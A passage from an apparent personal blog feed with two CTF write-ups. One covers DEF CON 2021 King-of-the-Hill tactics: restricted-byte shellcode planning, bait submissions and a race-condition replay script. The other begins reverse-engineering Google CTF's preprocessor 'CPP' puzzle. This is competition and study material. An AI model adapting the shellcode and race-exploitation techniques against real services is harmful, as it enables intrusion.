&amp;= \min_{v_i \in V_i} 
\left(f\left(v -v_{i} \mod |A|^s\right) + 
\min_{(v_1, \cdots, v_{i-1}) \in V_1 \times \cdots \times V_{i-1}} 
\left( f\left(v_i-v_{i-1} \mod |A|^s\right) + \sum_{j=1}^{i-1} f\left(v_{j} - v_{j-1} \mod |A|^s\right)\right)\right)\\
&amp;= \min_{v_i \in V_i} \left( f\left(v -v_{i} \mod |A|^s\right) + F_i(v_i)\right)

\end{align}\]

<p>The final answer is then \(\min_{v_n \in V_n} F_n(v_n)\). The time complexity of this DP is</p>

\[\Theta\left(\sum_{i=1}^n \left(\sum_{(v_i, v_{i-1}) \in V_i \times V_{i-1}} f^t\left(v_i - v_{i-1} \mod |A|^s\right)\right)\right)\]

<p>where \(f^t(v)\) is the time needed for the \(f\) algorithm to run on input \(v\).</p>
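<p>The recurrence translates almost line by line into code. Below is a minimal Python sketch, assuming each \(V_i\) is given as a plain list of candidate values and the cost function \(f\) is passed in as a parameter. The <code class="language-plaintext highlighter-rouge">toy_cost</code> function (a bit count) is a hypothetical stand-in for \(f\), used only so the example runs on its own.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>MOD = 2 ** 32  # |A| ** s with |A| = 256 and s = 4


def plan_chain(value_sets, cost, v0=0):
    """Choose v_i from each V_i so that sum f(v_i - v_{i-1} mod MOD) is minimal.

    value_sets: [V_1, ..., V_n], each an iterable of interchangeable values
    cost:       the per-step cost f(d) for a difference d in range(MOD)
    v0:         the initial rax value
    Returns (minimal total cost, [v_1, ..., v_n]).
    """
    best = {v0: (0, None)}  # layer i as {v: (F_i(v), predecessor)}
    layers = []
    for values in value_sets:
        # F_{i+1}(v) = min over v_i of f(v - v_i) + F_i(v_i)
        best = {
            v: min((prev_cost + cost((v - prev) % MOD), prev)
                   for prev, (prev_cost, _) in best.items())
            for v in set(values)
        }
        layers.append(best)
    v = min(best, key=lambda key: best[key][0])  # argmin over V_n of F_n
    total = best[v][0]
    chosen = []
    for layer in reversed(layers):  # follow predecessors back to v_1
        chosen.append(v)
        v = layer[v][1]
    chosen.reverse()
    return total, chosen


def toy_cost(d):
    """Hypothetical stand-in for f: the number of set bits in d."""
    return bin(d).count("1")
</code></pre></div></div>

<p>With <code class="language-plaintext highlighter-rouge">plan_chain([[1, 12], [12]], toy_cost)</code>, a greedy choice would take 1 first (cost 1) and then pay 3 for the step from 1 to 12, for a total of 4; the DP instead picks 12 twice and returns <code class="language-plaintext highlighter-rouge">(2, [12, 12])</code>. Each layer evaluates the cost once per pair of consecutive candidates, which matches the complexity bound above.</p>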

<hr />

<p>Using this strategy, we were able to generate a shellcode that uses only three distinct bytes and has the minimal length. But that’s not the end. We knew well that, under the rules, a winner’s shellcode would be banned, so we prepared some alternatives:</p>

<ul>
  <li>If <samp>0x05</samp> is banned, we could use <samp>0x2d</samp> (<code class="language-plaintext highlighter-rouge">sub eax</code>) or <samp>0x15</samp> (<code class="language-plaintext highlighter-rouge">adc eax</code>), although the analysis above would be a bit different.</li>
  <li>If <samp>0x50</samp> is banned, we could use <samp>0x81 0xc3</samp> (<code class="language-plaintext highlighter-rouge">add ebx</code>) and <samp>0x53</samp> (<code class="language-plaintext highlighter-rouge">push rbx</code>).</li>
  <li>If <samp>0xc3</samp> is banned, we could use <samp>0xc2</samp>, since <code class="language-plaintext highlighter-rouge">ret 0</code> is the same as <code class="language-plaintext highlighter-rouge">ret</code>.
    <ul>
      <li>If <samp>0xc2</samp> is banned, we could use <samp>0xff 0xe0</samp> (<code class="language-plaintext highlighter-rouge">jmp eax</code>).</li>
    </ul>
  </li>
</ul>

<p>For all of the above, we could replace the register <code class="language-plaintext highlighter-rouge">rax</code> with any other register and the method should still work. This analysis also applies to a four-byte set.</p>

<h4 id="phishing-strategy">Phishing Strategy</h4>

<p>It’s all fun and games until you remember that, according to the rules, any shellcode that leaves out at least one of the bytes used by the current top-of-the-hill shellcode could be accepted. So everything we’ve been doing is in vain!?</p>

<p>Well, if we could ban every single byte except for these three, we could obviously take the top of the hill and win without a doubt. However, we couldn’t submit again while we were at the top of the hill, so it seemed nearly impossible to ban exactly the bytes we wanted. Or was it?</p>

<p>The first idea that came to mind was to collude with another team. If another team submitted a shellcode that uses all the bytes, our three-byte shellcode would then wipe every other byte out. However, leaving aside the rules this would potentially break, it was clear that no team would collaborate with us on this.</p>

<p>Then a thought struck me: we could ban all the other bytes without anyone’s cooperation. The other teams would be helping us whether they wanted to or not. It was time for phishing!</p>

<p>The idea was dead simple:</p>

<ul>
  <li>We prepare a few shellcodes that each use as few distinct bytes as possible. These shellcodes CANNOT contain the three bytes we need, and the bytes they use should overlap with each other as little as possible.</li>
  <li>At each round, we check the currently banned bytes and pick a shellcode that contains none of them. Then, <strong>append all other bytes to the end of the shellcode</strong>, excluding the banned ones. For the three bytes we need, there are two cases:
    <ul>
      <li>If the current top-of-the-hill shellcode includes that byte, also append that byte to the end;</li>
      <li>Otherwise, leave that byte out of our submitted shellcode.</li>
    </ul>
  </li>
  <li>Once we’ve submitted that shellcode, we just wait for another team to submit whatever shellcode they have, and then submit our three-byte shellcode. At that point, every byte except the three we use should be banned.</li>
</ul>
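<p>The per-round bait construction can be sketched in a few lines of Python. This is a minimal sketch, not the script used in the game, assuming byte sets are Python <code class="language-plaintext highlighter-rouge">set</code>s of integers and that the base shellcode finishes before it ever reaches the appended padding. The name <code class="language-plaintext highlighter-rouge">build_bait</code> and the choice of simply taking the first usable candidate are hypothetical.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OUR_BYTES = {0x05, 0x50, 0xC3}  # the three bytes our ADD/PUSH chain relies on


def build_bait(candidates, banned, top_bytes):
    """Return this round's bait shellcode, or None if no candidate fits.

    candidates: small shellcodes (bytes) that avoid OUR_BYTES entirely
    banned:     set of byte values that are currently banned
    top_bytes:  set of byte values used by the current top-of-the-hill
    """
    usable = [sc for sc in candidates if not banned.intersection(sc)]
    if not usable:
        return None
    base = usable[0]
    padding = []
    for b in range(256):
        if b in banned or b in base:
            continue  # banned bytes are rejected; base bytes are already present
        if b in OUR_BYTES and b not in top_bytes:
            continue  # leave our byte out unless the top shellcode already uses it
        padding.append(b)
    # Assumption: the base shellcode exits before execution reaches the padding.
    return base + bytes(padding)
</code></pre></div></div>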

<p>Of course, if one of our three bytes was already banned, this couldn’t work. But overall it seemed like a really good strategy. It’s almost like phishing, because other teams end up submitting shellcode that is actually used against them, with no idea of what is happening.</p>

<blockquote>
  <p>As for how it actually went in the real game, I’ll leave that for a later part.</p>
</blockquote>

<h3 id="copying-homework">Copying Homework</h3>

<p>Recall the race condition we talked about earlier: another group of our KoH players was thinking about how to exploit it. The game also features an in-game leaderboard, where everyone can see each other’s accepted shellcode. We then came up with a great way to combine this race condition with the leaderboard:</p>

<ol>
  <li>Start two threads that connect to the game service simultaneously, so they have the same view of the history.</li>
  <li>Thread 1 keeps its connection alive, while thread 2 constantly reconnects to check for changes on the leaderboard.</li>
  <li>If thread 2 detects a new top-of-the-hill shellcode, it sends that shellcode to thread 1.</li>
  <li>Thread 1 then waits until a few seconds before the connection timeout (30 seconds) and submits that shellcode.</li>
</ol>
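<p>The copying logic can be sketched in Python with one extra thread and a queue. This is a minimal sketch, assuming two hypothetical callables: <code class="language-plaintext highlighter-rouge">poll_leaderboard</code> opens a fresh connection and returns the current top shellcode, and <code class="language-plaintext highlighter-rouge">submit</code> sends a shellcode over the connection opened at the start. The main thread plays the role of Thread 1; <code class="language-plaintext highlighter-rouge">margin</code> (how many seconds before the 30-second timeout to submit) and <code class="language-plaintext highlighter-rouge">poll_every</code> are made-up parameters.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import queue
import threading
import time


def copy_homework(poll_leaderboard, submit, timeout=30.0, margin=2.0, poll_every=1.0):
    """Replay a rival's new top-of-the-hill shellcode on an older connection.

    poll_leaderboard: hypothetical callable; opens a fresh connection and
                      returns the current top shellcode (bytes) or None
    submit:           hypothetical callable; sends a shellcode over the
                      connection that thread 1 opened at the start
    """
    opened = time.monotonic()              # thread 1 connects: old history view
    deadline = opened + timeout - margin   # submit shortly before the timeout
    found = queue.Queue()
    stop = threading.Event()

    def watcher():                         # thread 2: keep reconnecting
        seen = poll_leaderboard()
        while not stop.is_set():
            current = poll_leaderboard()
            if current is not None and current != seen:
                found.put(current)         # hand the new shellcode to thread 1
                return
            stop.wait(poll_every)

    threading.Thread(target=watcher, daemon=True).start()
    try:
        stolen = found.get(timeout=max(0.0, deadline - time.monotonic()))
    except queue.Empty:
        return None                        # nothing new before our connection expired
    finally:
        stop.set()
    time.sleep(max(0.0, deadline - time.monotonic()))
    submit(stolen)
    return stolen
</code></pre></div></div>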

<p>A diagram looks like this:</p>

<p><img src="/assets/images/defcon-ctf-2021/copy-diagram.png" alt="copy-diagram" /></p>

<p>This would work because Thread 1 had an old view of <code class="language-plaintext highlighter-rouge">history</code>, so if team B’s shellcode could be accepted for that version of <code class="language-plaintext highlighter-rouge">history</code>, then we could definitely use the same shellcode as well. This would also wipe Team A’s submission out of existence. A really powerful strategy indeed.</p>

<h4 id="countermeasure">Countermeasure</h4>

<p>The way to counter this (of course there is one) is for the submitting team to do exactly the same thing.</p>

<blockquote>
  <p>Although we didn’t think of this during preparation, I’ll put it here for the sake of consistency.</p>
</blockquote>

<p>When submitting a new shellcode, the team has to open two connections: one submits the shellcode immediately, and the other waits until just before the timeout to submit it again. This works because:</p>

<p>Suppose another team A, trying to steal the shellcode, opens a connection at \(t_0\). Any shellcode that team can steal must be submitted in the time range \((t_0, t_0+t_{\text{close}}]\), where \(t_{\text{close}}\) is the connection timeout. Suppose we submit our shellcode at \(t_1 \in (t_0, t_0+t_\text{close}]\); then the best they can do is to resubmit the shellcode at time \(t_0+t_\text{close}\). However, we then resubmit our shellcode at \(t_1+t_\text{close}\), so our record stays on the leaderboard. Notice that no matter how close \(t_0\) and \(t_1\) are, the stealing team must read <code class="language-plaintext highlighter-rouge">history</code> before our submission, so \(t_0 &lt; t_1\) and therefore \(t_0+t_\text{close}&lt; t_1+t_\text{close}\).</p>
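<p>The ordering argument can be checked with a tiny Python model. It is a sketch, assuming each party submits at the latest moment its connection allows and that the latest accepted submission is the one that stays on the leaderboard; <code class="language-plaintext highlighter-rouge">last_submitter</code> is a hypothetical helper.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def last_submitter(t0, t1, t_close):
    """Who owns the latest accepted submission in the scenario above.

    t0:      when the stealing team opened its connection (read history)
    t1:      when we first submitted; the argument requires t0 strictly before t1
    t_close: the connection timeout
    """
    submissions = [
        (t1, "us"),                    # our immediate submission
        (t0 + t_close, "stealer"),     # their replay on the stale connection
        (t1 + t_close, "us"),          # our replay on the second, delayed connection
    ]
    return max(submissions)[1]
</code></pre></div></div>

<p>Dropping our delayed replay from the list would leave the stealer’s submission at \(t_0+t_\text{close}\) as the latest one, which is exactly the attack described earlier.</p>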

<p>Therefore, as long as we submit our shellcode twice using this strategy, we can make sure that it won’t be stolen.</p>

<h3 id="some-other-methods">Some Other Methods</h3>

<h4 id="a-repository-of-shellcodes">A Repository of Shellcodes</h4>

<p>We also put all of our candidate shellcodes into a git repository, and wrote a script to pick shellcodes from the repository to submit, using some rules and heuristics:</p>

<ul>
  <li>First, we cross out the shellcodes that couldn’t possibly be accepted, either because they contain banned bytes or because they aren’t better than the current top-of-the-hill.</li>
  <li>Then, among the remaining shellcodes, we pick the one that, if accepted, would ban the most bytes.</li>
  <li>In case of a draw, we submit the shortest shellcode.</li>
</ul>
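<p>The selection rules above fit in a few lines of Python. This is a minimal sketch under two assumptions that the list does not spell out: a shellcode counts as “better” than the top-of-the-hill when it leaves out at least one of the top’s bytes (the acceptance rule from the phishing section), and the bytes it “would ban” are the top’s bytes that it does not use. <code class="language-plaintext highlighter-rouge">pick</code> is a hypothetical name.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def pick(repo, banned, top):
    """Choose the next shellcode to submit, following the rules above.

    repo:   iterable of candidate shellcodes (bytes)
    banned: set of currently banned byte values
    top:    the current top-of-the-hill shellcode (bytes)
    """
    top_bytes = set(top)
    acceptable = [
        sc for sc in repo
        if not banned.intersection(sc)       # no banned byte
        and not top_bytes.issubset(sc)       # leaves out at least one byte of the top
    ]
    if not acceptable:
        return None
    # Most newly banned bytes first; on a draw, the shortest shellcode.
    return min(acceptable, key=lambda sc: (-len(top_bytes.difference(sc)), len(sc)))
</code></pre></div></div>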

<p>Any shellcode we encountered during the game was also added to this repository.</p>

<h4 id="fuzzing">Fuzzing</h4>

<p>Remember the fuzzing we talked about in <em>zero-is-you</em>? Now it’s back. I didn’t work on this, so I don’t know much about the details, but essentially it takes the current top-of-the-hill and tries to fuzz out a shellcode that is shorter than the current one.</p>

<h4 id="using-existing-tools">Using Existing Tools</h4>

<p>There have clearly been CTFs before that required inputting shellcode using only printable characters, so there were bound to be existing tools to generate or transform shellcode into a limited character set. We found some of these tools, and they worked pretty well.</p>

<h2 id="game-start">Game Start</h2>

<p>When the game started, the phishing strategy worked right away and we blocked all the bytes, only to see the <code class="language-plaintext highlighter-rouge">history</code> rewritten by some other teams. At that time we hadn’t figured out the <em>countermeasure</em> yet, so that was that. Nonetheless, copying homework did work, and we were at the top of the hill for a moment.</p>

<p>We didn’t plan to use the 3-byte strategy until we had a reasonably large set of banned bytes. However, we had put our 3-byte shellcode into the repository as well, so the script automatically submitted it. Oh well, that’s bad. Not only was our trump card leaked, so that everyone could figure out how it worked, but we had also submitted it while there were still a lot of acceptable bytes, so anyone could take us down with an easy shellcode.</p>

<p>Furthermore, it was obvious that we were the only ones who had figured out how to construct a shellcode from only a 3-byte set (not exactly, more on that later), but everyone had noticed the race condition and started to copy each other’s homework. It was really sad to submit a shellcode, only to disappear from the leaderboard a few seconds later, replaced by another team with the same shellcode.</p>

<p>That being said, the game was fair to everyone, and we successfully copied others’ homework as well, so no real complaints here.</p>

<h3 id="unexpected-reset">Unexpected Reset</h3>

<p>We were the winner for the first round, everything was going smoothly, until it wasn’t.</p>

<p>At the start of the second round, everything seemed normal, with teams submitting different shellcodes again. But then, out of nowhere, a reset happened. It was not the usual reset that happens when someone becomes a winner; it was a reset as if the entire <code class="language-plaintext highlighter-rouge">history</code> had been wiped out. We could tell because we were no longer under the <em>Renowned ancestors</em> section. We thought maybe it was a sync issue, that some problem with the sync script had messed everything up. But the weirdest thing was yet to come.</p>

<p>StarBugs’ <strong>true</strong> 3-byte shellcode blew our minds. <code class="language-plaintext highlighter-rouge">69 89 73</code> immediately became the meme in the Discord server. There was no way, we thought, that such a short shellcode could do what the game asked us to do. We were certain that either the syncing script had messed something up, or it had cut off part of the shellcode.</p>

<p>However, OOO said that “the sync bot [was] working just fine,” which made me consider another possibility: they must have had some Linux kernel chroot-escape zero-day, or how else could you explain the situation?</p>

<p>Anyway, <code class="language-plaintext highlighter-rouge">698973</code> didn’t stay on top for long, because there were still plenty of acceptable bytes, so other teams were able to write something with the remaining bytes and kick StarBugs out. Maybe it was a fluke, we thought, so we quickly went back to the battlefield.</p>

<h3 id="read-from-stderr">Read From Stderr</h3>

<p>It was all going pretty normally for a few rounds, but then something weird happened again. This time, PPP threw out <code class="language-plaintext highlighter-rouge">000000ca00080091210000d4</code>, and we were all like, what? Soon enough, <code class="language-plaintext highlighter-rouge">698973</code> came back, and <code class="language-plaintext highlighter-rouge">699973</code> appeared. We were all dumbstruck. A quick run in our local environment clearly showed that these shellcodes don’t pass the test, so what trickery were they playing?</p>

<p>Before long, my teammate noticed something odd. If you ran these shellcodes, the execution would actually take longer for some reason. It would get stuck on one architecture and then time out after 5 seconds. That’s a bit weird. Then we noticed that if you pressed <kbd>Enter</kbd>, the shellcode would exit immediately. This was a sign that it was accepting input!</p>

<p>The questions then were: what was the input format, and why could you input anything at all? The second one wasn’t hard to figure out: we finally saw that in the subprocess execution, <code class="language-plaintext highlighter-rouge">stderr</code> was redirected to <code class="language-plaintext highlighter-rouge">1</code>, yet you could actually read data from it. This is really wild, but not something we hadn’t seen before.</p>
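<p>The effect is easy to reproduce locally. The following is only an illustration of the general mechanism, not the challenge’s actual setup: a minimal, POSIX-only Python sketch, assuming fd 1 is one end of a bidirectional socket (as with a network connection) and fd 2 is made a duplicate of it, so that a child process can read its input from <code class="language-plaintext highlighter-rouge">stderr</code>. The names <code class="language-plaintext highlighter-rouge">CHILD</code> and <code class="language-plaintext highlighter-rouge">read_from_stderr_demo</code> are hypothetical.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import socket
import subprocess
import sys

# The child reads its "input" from fd 2 and echoes it back, upper-cased, on fd 1.
CHILD = "import os; data = os.read(2, 64); os.write(1, data.upper())"


def read_from_stderr_demo(payload):
    """Show that fd 2 is readable once it duplicates a bidirectional fd 1."""
    ours, theirs = socket.socketpair()
    proc = subprocess.Popen(
        [sys.executable, "-c", CHILD],
        stdin=subprocess.DEVNULL,
        stdout=theirs,               # fd 1: one end of a two-way socket
        stderr=subprocess.STDOUT,    # fd 2: a duplicate of fd 1
    )
    theirs.close()
    ours.sendall(payload)            # this arrives on the child's fd 2
    proc.wait(timeout=10)
    reply = ours.recv(64)
    ours.close()
    return reply
</code></pre></div></div>

<p>Because fd 2 refers to the same socket as fd 1, a read on it succeeds just like a read on stdin would; nothing about the name “stderr” makes the descriptor write-only.</p>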

<p>While some of us were investigating how the shellcode itself worked, we took an educated guess that it simply accepted raw shellcode. So we quickly wrote a shellcode for that architecture, entered it when the shellcode waited for input, and it really did work.</p>

<p>After that, and some digging into the <code class="language-plaintext highlighter-rouge">RISC-V</code> and <code class="language-plaintext highlighter-rouge">ARM64</code> architecture specifications, we figured out how the shellcode could read from input while being only 3 bytes long.</p>

<blockquote>
  <p>I wasn’t working on this, so I don’t know exactly how it works. Readers can refer to some other fantastic write-ups.</p>
</blockquote>

<h3 id="phishing-worked">Phishing Worked</h3>

<p>An hour or so before the game ended, the phishing finally worked and the acceptable bytes were narrowed down to only 3. We were so happy, only to find out that someone had copied our homework.</p>

<p>That was really bad news, because we had naïvely submitted our optimal solutions already. We ended up having to look for another ROP chain that would result in a shorter shellcode after being converted into an ADD/PUSH ROP chain.</p>

<p>After a few minutes we found one, and we were so excited that someone just submitted the shellcode by hand. And you know what happened? Our homework was copied once again. Oh, big F.</p>

<p>Finally we found another one, and this time we had learned our lesson. We had finally figured out the countermeasure (mentioned above), so we submitted it the <em>right</em> way. We then started our 15-minute countdown while preparing the next three-byte payload.</p>

<p>However, another unexpected reset happened before we reached 15 minutes, and we didn’t even have time to start running our phishing script. Welp, that was the end of phishing, I guess.</p>

<h3 id="to-the-end">To the End</h3>

<p>From then on, it was basically a battle over shellcode that reads from <code class="language-plaintext highlighter-rouge">stderr</code>. Since we had figured out how it worked, we used this technique as well. In the end, PPP threw out the final bomb, shellcode <code class="language-plaintext highlighter-rouge">73 00</code>, probably the shortest shellcode that could be accepted.</p>

<p>We still haven’t figured out why the unexpected resets happened. Was it other teams doing something to alter <code class="language-plaintext highlighter-rouge">history</code>, or just a bad sync script made by OOO? We could probably figure it out by digging into the pcaps, but I’ll leave that to the reader.</p>

<h1 id="epilogue">Epilogue</h1>

<p>Writing this took way longer than I planned, but I’m glad I had most of the details laid out, as a memorial to this precious experience. I genuinely had a lot of fun playing with Tea Deliverers, and I hope they’ll bring me in again next year.</p>

<p>Finally, here’s an overall ranking for KoH:</p>

<p><img src="/assets/images/defcon-ctf-2021/koh-score.png" alt="koh-score" /></p>

<p>Thank you for reading!</p>]]></content><author><name>Hanbang Wang</name><email>contact@hanbang.wang</email></author><category term="blog" /><category term="Programming" /><category term="CTF" /><category term="Hacking" /><category term="KoH" /><summary type="html"><![CDATA[Please call me the king of King of the Hill.]]></summary></entry><entry><title type="html">Google CTF 2021</title><link href="http://0.0.0.0/blog/google-ctf-2021/" rel="alternate" type="text/html" title="Google CTF 2021" /><published>2021-07-19T07:40:00-04:00</published><updated>2021-07-19T07:40:00-04:00</updated><id>http://0.0.0.0/blog/google-ctf-2021</id><content type="html" xml:base="http://0.0.0.0/blog/google-ctf-2021/"><![CDATA[<p>This weekend I was planning to play <em>The Great Ace Attorney: Adventures</em> with my SO.
<!--more--></p>

<p>Yet here I am, and she’s pretty angry about that.</p>

<h1 id="cpp">CPP</h1>

<p><img src="/assets/images/google-ctf-2021/cpp1.png" alt="cpp.c" /></p>

<p><em>CPP</em> stands for <em>C Pre-Processor</em>, as the <code class="language-plaintext highlighter-rouge">-Wcpp</code> tag in the compiler’s warning message makes clear.</p>

<h2 id="eyeballing-the-code">Eyeballing the Code</h2>

<p>Opening the file, we see a bunch of preprocessor macros. In fact, most of the code is macros, and if we scroll to the bottom we can see a tiny bit of actual C code that will compile if preprocessing passes without errors.</p>

<p>It is pretty obvious that we need to figure out what the preprocessor does as it runs, and the flag we are looking for is hidden within.</p>

<p>Going back to the top of the file (line 16), we first see a list of definitions of flag characters from <code class="language-plaintext highlighter-rouge">FLAG_0</code> to <code class="language-plaintext highlighter-rouge">FLAG_26</code>, 27 characters in total. It’s followed by a list of definitions of the characters that may appear in the flag string (line 45): all 26 English letters in both lowercase and uppercase, the 10 digits, plus the underscore <code class="language-plaintext highlighter-rouge">_</code> and the braces <code class="language-plaintext highlighter-rouge">{</code> and <code class="language-plaintext highlighter-rouge">}</code>, each defined as its ASCII value. In total, 65 characters could possibly be used in the flag string. The number of possible flags is \(65^{27}\), which is clearly impossible to brute-force.</p>

<p>The next section is a list of definitions (line 111), including a variable <code class="language-plaintext highlighter-rouge">S</code> and a bunch of variables starting with <code class="language-plaintext highlighter-rouge">ROM_</code>. Without any further context, we can assume that this part defines the memory for this program, where <code class="language-plaintext highlighter-rouge">ROM_xxxxxxxx_y</code> means the <code class="language-plaintext highlighter-rouge">y</code>th bit of the address <code class="language-plaintext highlighter-rouge">0bxxxxxxxx</code>. The pre-defined memory values lie within the range <code class="language-plaintext highlighter-rouge">0b00000000 - 0b01111111</code> (0x0 - 0x7F), and the flag string is stored in <code class="language-plaintext highlighter-rouge">0b10000000 - 0b10011010</code> (0x80 - 0x9A).</p>

<p>It is also from this part (line 840) that we can tell our assumption above is correct. Furthermore, we can see that the <code class="language-plaintext highlighter-rouge">0</code>th bit of each address in <code class="language-plaintext highlighter-rouge">ROM</code> is the least-significant bit, and the <code class="language-plaintext highlighter-rouge">7</code>th is the most-significant one. A code snippet like this</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if FLAG_0 &amp; (1&lt;&lt;2)
#define ROM_10000000_2 1
#else
#define ROM_10000000_2 0
#endif
</span></code></pre></div></div>

<p>checks bit 2 of <code class="language-plaintext highlighter-rouge">FLAG_0</code> and stores the result in <code class="language-plaintext highlighter-rouge">ROM_10000000_2</code>.</p>
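<p>To make the layout concrete, here is a small Python model of how the flag ends up in <code class="language-plaintext highlighter-rouge">ROM</code>, assuming exactly the naming scheme described above (byte <code class="language-plaintext highlighter-rouge">i</code> of the flag at address <code class="language-plaintext highlighter-rouge">0x80 + i</code>, bit 0 least significant). <code class="language-plaintext highlighter-rouge">flag_rom</code> and <code class="language-plaintext highlighter-rouge">load_byte</code> are hypothetical helpers, not part of <code class="language-plaintext highlighter-rouge">cpp.c</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def flag_rom(flag):
    """Expand a flag string into ROM_address_bit values, the way cpp.c does.

    Byte i of the flag lives at address 0x80 + i; bit 0 is the least significant.
    """
    rom = {}
    for i, ch in enumerate(flag):
        address = format(0x80 + i, "08b")
        for bit in range(8):
            # the same test as the #if FLAG_i ... block: is this bit set?
            rom["ROM_%s_%d" % (address, bit)] = (ord(ch) // 2 ** bit) % 2
    return rom


def load_byte(rom, address):
    """Reassemble the byte at an address from its eight ROM bits."""
    name = format(address, "08b")
    return sum(rom["ROM_%s_%d" % (name, bit)] * 2 ** bit for bit in range(8))
</code></pre></div></div>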

<p>The next five lines (lines 1920-1924) define some macro functions. We can see that the function <code class="language-plaintext highlighter-rouge">LD(x, y)</code> expands to <code class="language-plaintext highlighter-rouge">ROM_x_y</code>, meaning that <code class="language-plaintext highlighter-rouge">LD</code> loads the <code class="language-plaintext highlighter-rouge">y</code>th bit from address <code class="language-plaintext highlighter-rouge">x</code> in <code class="language-plaintext highlighter-rouge">ROM</code>. The function <code class="language-plaintext highlighter-rouge">MA(l0, l1, l2, l3, l4, l5, l6, l7)</code> concatenates bits <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code> together in reverse order, meaning <code class="language-plaintext highlighter-rouge">MA(1, 1, 1, 1, 0, 0, 0, 1)</code> gives the string <code class="language-plaintext highlighter-rouge">10001111</code>. We can’t yet be sure that <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code> only take 0/1 values, but it will become apparent in the following analysis. The final macro <code class="language-plaintext highlighter-rouge">l</code> is simply shorthand for the above <code class="language-plaintext highlighter-rouge">MA</code> function called on <code class="language-plaintext highlighter-rouge">l0</code> to <code class="language-plaintext highlighter-rouge">l7</code>.</p>
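<p>The two macro functions can be mirrored in Python as well. This sketch assumes <code class="language-plaintext highlighter-rouge">ROM</code> is a dictionary keyed by macro names such as <code class="language-plaintext highlighter-rouge">ROM_10000000_2</code>; <code class="language-plaintext highlighter-rouge">ld</code> and <code class="language-plaintext highlighter-rouge">ma</code> are hypothetical lowercase stand-ins for <code class="language-plaintext highlighter-rouge">LD</code> and <code class="language-plaintext highlighter-rouge">MA</code>.</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code>def ld(rom, x, y):
    """LD(x, y) pastes its arguments into ROM_x_y: bit y of the byte at address x."""
    return rom["ROM_%s_%s" % (x, y)]


def ma(l0, l1, l2, l3, l4, l5, l6, l7):
    """MA(l0, ..., l7) concatenates the bits in reverse, so l7 comes first."""
    return "".join(str(bit) for bit in (l7, l6, l5, l4, l3, l2, l1, l0))
</code></pre></div></div>

<p>Feeding the eight <code class="language-plaintext highlighter-rouge">LD</code> bits of an address into <code class="language-plaintext highlighter-rouge">MA</code> yields that byte as a binary string, most significant bit first.</p>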

<h3 id="code-formatting">Code Formatting</h3>

<p>The next part, starting from line 1926, is very messy, mainly because there are a lot of <code class="language-plaintext highlighter-rouge">#if...</code> directives without proper indentation, which makes it really hard to read. We wrote a simple formatter:</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">with</span> <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">cpp.c</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">r</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">in_file</span><span class="p">,</span> \
     <span class="nf">open</span><span class="p">(</span><span class="sh">'</span><span class="s">cpp.formatted.c</span><span class="sh">'</span><span class="p">,</span> <span class="sh">'</span><span class="s">w</span><span class="sh">'</span><span class="p">)</span> <span class="k">as</span> <span class="n">out_file</span><span class="p">:</span>
    <span class="n">indent</span> <span class="o">=</span> <span class="sh">''</span>
    <span class="k">for</span> <span class="n">line</span> <span class="ow">in</span> <span class="n">in_file</span><span class="p">:</span>
        <span class="k">if</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#if</span><span class="sh">'</span><span class="p">):</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
            <span class="n">indent</span> <span class="o">+=</span> <span class="sh">'</span><span class="s">  </span><span class="sh">'</span>
        <span class="k">elif</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#else</span><span class="sh">'</span><span class="p">):</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
        <span class="k">else</span><span class="p">:</span>
            <span class="k">if</span> <span class="n">line</span><span class="p">.</span><span class="nf">startswith</span><span class="p">(</span><span class="sh">'</span><span class="s">#endif</span><span class="sh">'</span><span class="p">):</span>
                <span class="n">indent</span> <span class="o">=</span> <span class="n">indent</span><span class="p">[:</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
            <span class="nf">print</span><span class="p">(</span><span class="n">indent</span> <span class="o">+</span> <span class="n">line</span><span class="p">,</span> <span class="n">end</span><span class="o">=</span><span class="sh">''</span><span class="p">,</span> <span class="nb">file</span><span class="o">=</span><span class="n">out_file</span><span class="p">)</span>
</code></pre></div></div>

<p>The end result looks like this:</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#if S == 3
</span>  <span class="cp">#undef S
</span>  <span class="cp">#define S 4
</span>  <span class="cp">#undef c
</span>  <span class="cp">#ifndef R0
</span>    <span class="cp">#ifndef Z0
</span>      <span class="cp">#ifdef c
</span>        <span class="cp">#define R0
</span>        <span class="cp">#undef c
</span>      <span class="cp">#endif
</span>    <span class="cp">#else
</span>      <span class="cp">#ifndef c
</span>        <span class="cp">#define R0
</span><span class="p">[...]</span>
</code></pre></div></div>

<p>This is much more intelligible.</p>

<h3 id="structure-overview">Structure Overview</h3>

